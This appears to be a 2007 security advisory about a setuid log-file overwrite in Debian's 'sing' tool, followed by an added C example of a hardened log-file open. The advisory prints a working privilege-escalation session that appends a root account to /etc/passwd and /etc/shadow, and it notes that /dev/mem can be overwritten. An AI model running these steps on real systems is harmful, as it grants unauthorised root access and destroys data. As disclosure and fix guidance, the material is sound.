sing (debian) vulnerability

2007.12.04
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Hello,

The sing utility (Send Nasty ICMP Garbage) is a ping replacement that allows sending ICMP packets with spoofed source and custom ICMP types/codes (http://sourceforge.net/projects/sing). The Debian package provides sing as a suid binary (actually, the sid distribution asks the user whether he'd like it installed suid, I'm not 100% sure, but in etch, it installs it suid anyway; should check). The sing program has the "-L" option to log its output into a log file. Due to lack of file ownership checking, any file could be overwritten (more precisely, appended to) with its log output. I tried to play with making the output usable for some privilege escalation purposes, but failed initially (sing escapes some bad input, ehm). However, it's still possible for any user to crash the system or destroy block devices' data (provided that the binary is installed SUID, of course). Exploiting that is trivial: just give /dev/mem or any block device as a log file. However, later on, I decided to try it again to gain root privileges and it turned out to be quite trivial.

Here is an example session:

gat3way@gat3way:~$ cat hah
hack:x:0:0:/tmp:/bin/sh
n
gat3way@gat3way:~$ cat hah1
hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7:::
n
gat3way@gat3way:~$ grep hack /etc/passwd
gat3way@gat3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`"
SINGing to localhost (127.0.0.1): 78 data bytes
78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms

--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.073/0.073/0.073 ms
gat3way@gat3way:~$ sing -L /etc/passwd localhost -p "`cat hah`"
SINGing to localhost (127.0.0.1): 43 data bytes
43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms

--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.083/0.083/0.083 ms
gat3way@gat3way:~$ grep hack /etc/passwd
hack:x:0:0:/tmp:/bin/sh
gat3way@gat3way:~$ ssh hack@localhost
hack@localhost's password:
..
root@gat3way:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gat3way:~#

After all, that's not a huge problem, because quite a few users install sing AFAIK. But it's a very easily exploited vulnerability OTOH and leads to a superuser privilege escalation, system crash or destroying data.

Regards,
Milen Rangelov

P.S. Sorry if this mail is duplicated; I had some problems with my mail server and had to resend it.
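What a fix for this class of bug looks like, as an added illustration that is neither sing's code nor the Debian patch: a hypothetical open_log_as_invoker() that a setuid tool could use for an option like "-L". It assumes a Linux/glibc system. The effective UID/GID are dropped to the invoking user's before the open(2) so the kernel applies that user's permissions, symlinks are refused, anything that is not a regular file owned by the invoker (device nodes such as /dev/mem, other users' files) is rejected after the open, and privileges are restored afterwards for the raw-socket work. The demo_* helpers and the file names under /tmp are constructed for the example.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical hardened open for a user-supplied log path in a setuid
 * program. Returns an fd >= 0 on success, -1 on failure (errno set).
 * Effective UID/GID are always restored before returning. */
int open_log_as_invoker(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();
    int fd, saved_errno = 0;

    /* Become the invoking user for the open(2). Drop the group while we
     * still hold the privilege to change it, then the user. */
    if (setegid(rgid) == -1 || seteuid(ruid) == -1)
        return -1;

    /* O_NOFOLLOW: a symlink in a world-writable directory cannot redirect
     * the write. O_CLOEXEC: never leak the fd to child processes.
     * O_CREAT is harmless here because we create as the invoker. */
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd == -1)
        saved_errno = errno;

    /* Restore privileges for the raw-socket work that needs them. */
    if (seteuid(euid) == -1 || setegid(egid) == -1) {
        if (fd != -1) close(fd);
        abort();  /* unknown privilege state: do not continue */
    }
    if (fd == -1) { errno = saved_errno; return -1; }

    /* Belt and braces: only a regular file owned by the invoker is a
     * valid log target. This rejects /dev/mem, block devices and files
     * that merely happen to be writable. */
    struct stat st;
    if (fstat(fd, &st) == -1 || !S_ISREG(st.st_mode) || st.st_uid != ruid) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed self-check: log one line to a private temp file and read
 * it back. Returns 1 on success, 0 on any failure. */
int demo_roundtrip(void)
{
    char tmpl[] = "/tmp/sing-log-demo-XXXXXX";
    const char *line = "constructed log line: 78 bytes from 127.0.0.1\n";
    char buf[128] = {0};
    int tfd = mkstemp(tmpl);
    if (tfd == -1) return 0;
    close(tfd);

    int fd = open_log_as_invoker(tmpl);
    if (fd == -1) { unlink(tmpl); return 0; }
    ssize_t n = write(fd, line, strlen(line));
    close(fd);

    int rfd = open(tmpl, O_RDONLY);
    ssize_t r = (rfd == -1) ? -1 : read(rfd, buf, sizeof buf - 1);
    if (rfd != -1) close(rfd);
    unlink(tmpl);
    return n == (ssize_t)strlen(line) && r == n && strcmp(buf, line) == 0;
}

/* Constructed self-check: a symlink is refused even when it points at a
 * file the invoker owns. Returns 1 if the open was rejected. */
int demo_symlink_rejected(void)
{
    char tmpl[] = "/tmp/sing-log-target-XXXXXX";
    char link[64];
    int tfd = mkstemp(tmpl);
    if (tfd == -1) return 0;
    close(tfd);
    snprintf(link, sizeof link, "%s.lnk", tmpl);
    if (symlink(tmpl, link) == -1) { unlink(tmpl); return 0; }
    int fd = open_log_as_invoker(link);
    if (fd != -1) close(fd);
    unlink(link);
    unlink(tmpl);
    return fd == -1;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <logfile>\n", argv[0]); return 2; }
    int fd = open_log_as_invoker(argv[1]);
    if (fd == -1) { perror("log file refused"); return 1; }
    const char msg[] = "log opened with the invoker's privileges\n";
    write(fd, msg, sizeof msg - 1);
    close(fd);
    return 0;
}
```

Build with `cc -o safelog safelog.c` and run it with a path; a regular file you own is accepted, while /dev/null, a symlink, or a file under a directory you cannot write to is refused. Even with this check, the better Debian-side mitigation for a ping-like tool is to not install it setuid at all and grant only the raw-socket capability (CAP_NET_RAW as a file capability), so a logic bug in path handling never runs with full root.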

